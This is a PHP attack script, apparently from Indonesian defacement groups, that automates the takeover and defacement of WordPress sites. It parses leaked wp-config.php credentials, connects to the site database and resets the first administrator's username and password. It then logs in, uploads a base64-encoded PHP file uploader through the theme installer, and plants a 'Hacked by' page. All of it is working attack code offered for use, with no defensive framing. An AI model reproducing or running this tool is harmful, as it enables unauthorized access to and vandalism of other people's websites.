WP Auto reset + deface

1. <?php
2. // Tu5b0l3d
3. // thx to: IndoXPloit, HNc
4. // Wordpress Auto Deface Melalui link Config.
5.  
6. error_reporting(0);
7.     if($_POST){
8.  
9.         function ambilKata($param, $kata1, $kata2){
10.     if(strpos($param, $kata1) === FALSE) return FALSE;
11.     if(strpos($param, $kata2) === FALSE) return FALSE;
12.     $start = strpos($param, $kata1) + strlen($kata1);
13.     $end = strpos($param, $kata2, $start);
14.     $return = substr($param, $start, $end - $start);
15.     return $return;
16. }
17.  
18.     function anucurl($sites){
19.         $ch1 = curl_init ("$sites");
20. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
21. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
22. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
23. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
24. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
25. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
26. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
27. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
28. $data = curl_exec ($ch1);
29. return $data;
30.     }
31.  
32.     function lohgin($cek, $web, $userr, $pass){
33.         $post = array(
34.                     "log" => "$userr",
35.                     "pwd" => "$pass",
36.                     "rememberme" => "forever",
37.                     "wp-submit" => "Log In",
38.                     "redirect_to" => "$web/wp-admin/",
39.                     "testcookie" => "1",
40.                     );
41. $ch = curl_init ("$cek");
42. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
43. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
44. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
45. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
46. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
47. curl_setopt ($ch, CURLOPT_POST, 1);
48. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
49. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
50. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
51. $data6 = curl_exec ($ch);
52. return $data6;
53.     }
54.  
55.         $link = $_POST['link'];
56.         $script = $_POST['script'];
57.         if($script==""){
58.             echo "<center><h1>Isi Dulu Hacked By</h1></center>";
59.         }
60.         else{
61. $host = ambilkata($link,"DB_HOST', '","'");
62.                     $username = ambilkata($link,"DB_USER', '","'");
63.                     $password = ambilkata($link,"DB_PASSWORD', '","'");
64.                     $db = ambilkata($link,"DB_NAME', '","'");
65.                     $dbprefix = ambilkata($link,"table_prefix  = '","'");
66.                     $user_baru = "xxx";
67.                     $password_baru = "xxx";
68.                     $prefix = $db.".".$dbprefix."users";
69.                     $sue = $db.".".$dbprefix."options";
70.                     $pass = md5("$password_baru");
71.                     $blog ="Hacked by ./Bl4ckcod37 | RES7OCK CREW";
72.                    
73.  
74.  
75.                     echo "# Db Host: $host<br>";
76.                     echo "# Db user: $username<br>";
77.                     echo "# Db Password: $password<br>";
78.                     echo "# Db name: $db<br>";
79.                     echo "# Table_Prefix: $dbprefix<br>";      
80.  
81.         mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
82.         mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
83.  
84.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
85.         $r=mysql_fetch_array($tampil);
86.         $id = $r[ID];
87.  
88.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
89.         $r2=mysql_fetch_array($tampil2);
90.         $target = $r2[option_value];
91.          echo "# $target<br>";
92.        
93.  
94.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
95.  
96.  
97.  
98.    
99.  
100. $site= "$target/wp-login.php";
101. $site2= "$target/wp-admin/theme-install.php?upload";
102. $a = lohgin($site, $target, $user_baru, $password_baru);
103. $b = lohgin($site2, $target, $user_baru, $password_baru);
104.            
105.  
106. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
107. echo "# token -> $anu2<br>";
108.  
109.  
110. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
111.  
112. $www = "m.php";
113. $fp5 = fopen($www,"w");
114. fputs($fp5,$upload3);
115.    
116.   $post2 = array(
117.                     "_wpnonce" => "$anu2",
118.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
119.                     "themezip" => "@$www",
120.                     "install-theme-submit" => "Install Now",
121.                     );
122. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
123. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
124. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
125. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
126. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
127. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
128. curl_setopt ($ch, CURLOPT_POST, 1);
129. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
130. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
131. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
132. $data3 = curl_exec ($ch);
133.  
134. $y = date("Y");
135. $m = date("m");
136.  
137. $namafile = "id.php";
138. $fpi = fopen($namafile,"w");
139. fputs($fpi,$script);
140.  
141. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
142. curl_setopt($ch6, CURLOPT_POST, true);
143. curl_setopt($ch6, CURLOPT_POSTFIELDS,
144. array('file3'=>"@$namafile"));
145. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
146. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
147. $postResult = curl_exec($ch6);
148. curl_close($ch6);
149.  
150. $as = "$target/k.php";
151. $bs = anucurl($as);
152.  if(preg_match("#hacked#si",$bs)){
153.                         echo "# <font color='green'>berhasil mepes...</font><br>";
154.                         echo "# $as<br>";
155.                        
156.                     }
157.                     else{
158.                         echo "# <font color='red'>gagal mepes...</font><br>";
159.                         echo "# coba aja manual: <br>";
160.                         echo "# $target/wp-login.php<br>";
161.                         echo "# username: $user_baru<br>";
162.                         echo "# password: $password_baru<br>";
163.  
164.                        
165.                     }
166.                 }
167.  
168.  
169.  
170.  
171.     }else{
172.             echo '<html>
173.     <head>
174.         <title>Created By IndoXploit Just For Wordpress</title>
175.     </head>
176.  
177.     <body>
178.             <center>
179.                         <table>
180.                             <tr><td><form method="post"></td></tr>
181.                             <textarea class="inputz" name="link" cols="70"  rows="20" placeholder="Content wordpress config"></textarea><br>
182.                             <tr><td><input type="text" name="script" value="Hacked by ./Bl4ckcod37 | RES7OCK CREW"> //Must Hacked</td></tr>
183.  
184.                             <tr><td><input type="submit" value="Submit"></td></tr>
185.                             </form>
186.                         </table>
187.                        
188.             </center>
189.  
190.     </body>
191. </html>';
192.         }
193.  
194. ?>